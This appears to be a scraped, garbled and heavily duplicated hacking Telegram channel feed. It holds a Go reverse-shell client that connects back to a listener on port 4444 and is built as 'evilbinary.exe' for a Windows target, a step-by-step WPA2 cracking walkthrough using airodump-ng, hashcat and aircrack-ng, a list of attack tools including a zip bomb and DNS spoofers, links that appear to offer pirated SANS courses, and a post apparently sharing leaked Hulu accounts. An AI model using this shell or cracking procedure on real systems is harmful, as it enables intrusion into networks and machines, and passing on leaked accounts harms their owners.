β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ A Reverse HTTP Shell In Kali Linux:
HEREβS WHAT YOU NEED :
1) Kali Linux Virtual Instance (VirtualBox)
2) Windows 10 Virtual Instance (VirtualBox) -OR-
3) Linux Virtual Instance (VirtualBox)
4) Here is the code for my program, in a file named tcpServer.go:
package main import (
"bufio"
"fmt"
"log"
"net"
"os/exec" "strings"
)
const (
RPORT = "4444"
)
func CheckErr(e error) {
if e != nil {
log.Fatal("Error %s", e)
}
}
func main() {
conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT)) CheckErr(err)
remoteCmd, err := bufio.NewReader(conn).ReadString('\n') CheckErr(err)
// remove newline character
newCmd := strings.TrimSuffix(remoteCmd, "\n")
command := exec.Command(newCmd)
command.Stdin = conn
command.Stdout = conn
command.Stderr = conn
command.Run()
}
π¦After putting together the program I need to compile the client for Windows for my Windows target. This is how it is done below:
> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
π¦ A Reverse HTTP Shell In Kali Linux:
HEREβS WHAT YOU NEED :
1) Kali Linux Virtual Instance (VirtualBox)
2) Windows 10 Virtual Instance (VirtualBox) -OR-
3) Linux Virtual Instance (VirtualBox)
4) Here is the code for my program, in a file named tcpServer.go:
package main import (
"bufio"
"fmt"
"log"
"net"
"os/exec" "strings"
)
const (
RPORT = "4444"
)
func CheckErr(e error) {
if e != nil {
log.Fatal("Error %s", e)
}
}
func main() {
conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT)) CheckErr(err)
remoteCmd, err := bufio.NewReader(conn).ReadString('\n') CheckErr(err)
// remove newline character
newCmd := strings.TrimSuffix(remoteCmd, "\n")
command := exec.Command(newCmd)
command.Stdin = conn
command.Stdout = conn
command.Stderr = conn
command.Run()
}
π¦After putting together the program I need to compile the client for Windows for my Windows target. This is how it is done below:
> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
2) The program works fine except for it is still primitive. I mean by that it
3) can not handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY
4) If you donβt agree with the preceding statement, try setting flags in C#β¦Flags in go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your
5) Here is a basic example of checking for arguments passed via the command line to our program. :
func main() {
// read args
arguments := os.Args
if len(arguments) == 1 {
fmt.Println("Not enough arguments!") return
}
> 1 macbook$ go run tcpServer.go -p 4444
6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output βListening on 4444β¦β, because the value of the pointer to the string flag variable has been set as 4444.
7) LPORT := flag.String("p", "", "port to listen on")
fmt.Printf("lport is %s", *LPORT)
flag.Parse()
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT)) CheckErr(err)
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
3) can not handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY
4) If you donβt agree with the preceding statement, try setting flags in C#β¦Flags in go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your
5) Here is a basic example of checking for arguments passed via the command line to our program. :
func main() {
// read args
arguments := os.Args
if len(arguments) == 1 {
fmt.Println("Not enough arguments!") return
}
> 1 macbook$ go run tcpServer.go -p 4444
6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output βListening on 4444β¦β, because the value of the pointer to the string flag variable has been set as 4444.
7) LPORT := flag.String("p", "", "port to listen on")
fmt.Printf("lport is %s", *LPORT)
flag.Parse()
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT)) CheckErr(err)
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Greatest 2020 Hacking tools-Tracking-backdoor and more...
0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/
3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d
acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/
Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/
findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com
sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r
ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html
admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Greatest 2020 Hacking tools-Tracking-backdoor and more...
0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/
3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d
acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/
Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/
findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com
sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r
ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html
admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
jon.oberheide.org
0trace.py | Jon Oberheide
Jon Oberheide's website
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKING COURSES & TOOLS 2020 :
SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦TOPIC HACKING COURSES & TOOLS 2020 :
SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦X56 HULU PREMIUMβ
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN
> provide with screanshoat after login to @Undercode_bot
pastebin.com/9HdcwYHN
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦So you want to build your own tools ?
That's great!
1) tabs: please use tabs instead of align code with spaces, tabs are much more flexible in order to make modifications in code, is program
independent(some programs will remove spaces) and is better readable.
2) context: if you have settings or anything else you want to make available for later use, you can make use of the context array: $_CONTEXT
This is an array, so make sure the key doesn't exist, if you're not sure if the key has been set, just dump the context array in your script:
> var_export($_CONTEXT);
paths: if you want to make shortcuts to (http) files you can add them to $_PATHS which contains the paths(basically shortcuts) and is also an array.
Again if you want to add new items to this array, make sure they aren't defined in your script:
var_export($_PATHS);
3) buffer output: unless you are building a hacksuite app or you're using the hacksuite in order to feed your application, you must buffer the output in $sCode until the script ends
4) functions: use the functions of folder Functions as much as possible, rather than creating new functions folder consistency: always make sure that you put new files into folders that make sense
variable naming: you're not exactly forced to do this but since most in the suite is coded like this it's recommended to follow the structure below.
> boolean: bSomeVar
string: sSomeVar
array: aSomeVar
integer: iSomeVar
double: dSomeVar
resource: rConnect
object: oSomeObject
object from selfmade class: cSomeObject
5) As you can see this makes the code better readable and you can find out right away what type the variable contains.
Protect include files
You also need to protect your include files from being accessed directly. You can do this by simply checking if the constant IN_SCRIPT has been defined.
if(!defined('IN_SCRIPT')){
exit;
}
6) You can put this code at the start of the code in all of your include files.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β
π¦So you want to build your own tools ?
That's great!
1) tabs: please use tabs instead of align code with spaces, tabs are much more flexible in order to make modifications in code, is program
independent(some programs will remove spaces) and is better readable.
2) context: if you have settings or anything else you want to make available for later use, you can make use of the context array: $_CONTEXT
This is an array, so make sure the key doesn't exist, if you're not sure if the key has been set, just dump the context array in your script:
> var_export($_CONTEXT);
paths: if you want to make shortcuts to (http) files you can add them to $_PATHS which contains the paths(basically shortcuts) and is also an array.
Again if you want to add new items to this array, make sure they aren't defined in your script:
var_export($_PATHS);
3) buffer output: unless you are building a hacksuite app or you're using the hacksuite in order to feed your application, you must buffer the output in $sCode until the script ends
4) functions: use the functions of folder Functions as much as possible, rather than creating new functions folder consistency: always make sure that you put new files into folders that make sense
variable naming: you're not exactly forced to do this but since most in the suite is coded like this it's recommended to follow the structure below.
> boolean: bSomeVar
string: sSomeVar
array: aSomeVar
integer: iSomeVar
double: dSomeVar
resource: rConnect
object: oSomeObject
object from selfmade class: cSomeObject
5) As you can see this makes the code better readable and you can find out right away what type the variable contains.
Protect include files
You also need to protect your include files from being accessed directly. You can do this by simply checking if the constant IN_SCRIPT has been defined.
if(!defined('IN_SCRIPT')){
exit;
}
6) You can put this code at the start of the code in all of your include files.
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Hack wifi topic article on git :
1) Cracking a Wi-Fi Network
Monitor Mode
Begin by listing wireless interfaces that support monitor mode with:
> airmon-ng
2) If you do not see an interface listed then your wireless card does not support monitor mode
3)this will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
> airmon-ng start wlan0
4) Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
5) Find Your Target
6) Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
7) You should see output similar to what is below.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
8) For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.
9) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
10) 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
11) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
12) If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
π¦Hack wifi topic article on git :
1) Cracking a Wi-Fi Network
Monitor Mode
Begin by listing wireless interfaces that support monitor mode with:
> airmon-ng
2) If you do not see an interface listed then your wireless card does not support monitor mode
3)this will assume your wireless interface name is wlan0 but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:
> airmon-ng start wlan0
4) Run iwconfig. You should now see a new monitor mode interface listed (likely mon0 or wlan0mon).
5) Find Your Target
6) Start listening to 802.11 Beacon frames broadcast by nearby wireless routers using your monitor interface:
airodump-ng mon0
7) You should see output similar to what is below.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
8) For the purposes of this demo, we will choose to crack the password of my network, "hackme". Remember the BSSID MAC address and channel (CH) number as displayed by airodump-ng, as we will need them both for the next step.
9) Capture a 4-way Handshake
WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. You don't have to know anything about what that means, but you do have to capture one of these handshakes in order to crack the network password. These handshakes occur whenever a device connects to the network, for instance, when your neighbor returns home from work. We capture this handshake by directing airmon-ng to monitor traffic on the target network using the channel and bssid values discovered from the previous command.
# replace -c and --bssid values with the values of your target network
# -w specifies the directory where we will save the packet capture
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
10) 9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
11) Now we wait... Once you've captured a handshake, you should see something like [ WPA handshake: bc:d3:c9:ef:d2:67 at the top right of the screen, just right of the current time.
12) If you are feeling impatient, and are comfortable using an active attack, you can force devices connected to the target network to reconnect, be sending malicious deauthentication packets at them. This often results in the capture of a 4-way handshake. See the deauth attack section below for info on this.
13) Once you've captured a handshake, press ctrl-c to quit airodump-ng. You should see a .cap file wherever you told airodump-ng to save the capture (likely called -01.cap). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:
mv ./-01.cap hackme.cap
14) Crack the Network Password
The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
15) Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
16) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
> cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
17) git clone https://github.com/brannondorsey/naive-hashcat
18) cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
19) Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
20) Where the last two fields separated by : are the network name and password respectively.
21) If you would like to use hashcat without naive-hashcat see this page for info.
Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:
21) # download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
π¦Example :Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
mv ./-01.cap hackme.cap
14) Crack the Network Password
The final step is to crack the password using the captured handshake. If you have access to a GPU, I highly recommend using hashcat for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.
15) Note that both attack methods below assume a relatively weak user generated password. Most WPA/WPA2 routers come with strong 12 character random passwords that many users (rightly) leave unchanged. If you are attempting to crack one of these passwords, I recommend using the Probable-Wordlists WPA-length dictionary files.
16) Cracking With naive-hashcat (recommended)
Before we can crack the password using naive-hashcat, we need to convert our .cap file to the equivalent hashcat file format .hccapx. You can do this easily by either uploading the .cap file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx tool directly.
> cap2hccapx.bin hackme.cap hackme.hccapx
Next, download and run naive-hashcat:
# download
17) git clone https://github.com/brannondorsey/naive-hashcat
18) cd naive-hashcat
# download the 134MB rockyou dictionary file
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# crack ! baby ! crack !
# 2500 is the hashcat hash mode for WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
19) Naive-hashcat uses various dictionary, rule, combination, and mask (smart brute-force) attacks and it can take days or even months to run against mid-strength passwords. The cracked password will be saved to hackme.pot, so check this file periodically. Once you've cracked the password, you should see something like this as the contents of your POT_FILE:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
20) Where the last two fields separated by : are the network name and password respectively.
21) If you would like to use hashcat without naive-hashcat see this page for info.
Cracking With Aircrack-ng
Aircrack-ng can be used for very basic dictionary attacks running on your CPU. Before you run the attack you need a wordlist. I recommend using the infamous rockyou dictionary file:
21) # download the 134MB rockyou dictionary file
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
Note, that if the network password is not in the wordfile you will not crack the password.
# -a2 specifies WPA2, -b is the BSSID, -w is the wordfile
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
If the password is cracked you will see a KEY FOUND! message in the terminal followed by the plain text version of the network password.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
π¦Example :Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
hashcat.net
hashcat cap2hccapx - advanced password recovery
CAP-to-HCCAPX online converter page for WPA/WPA2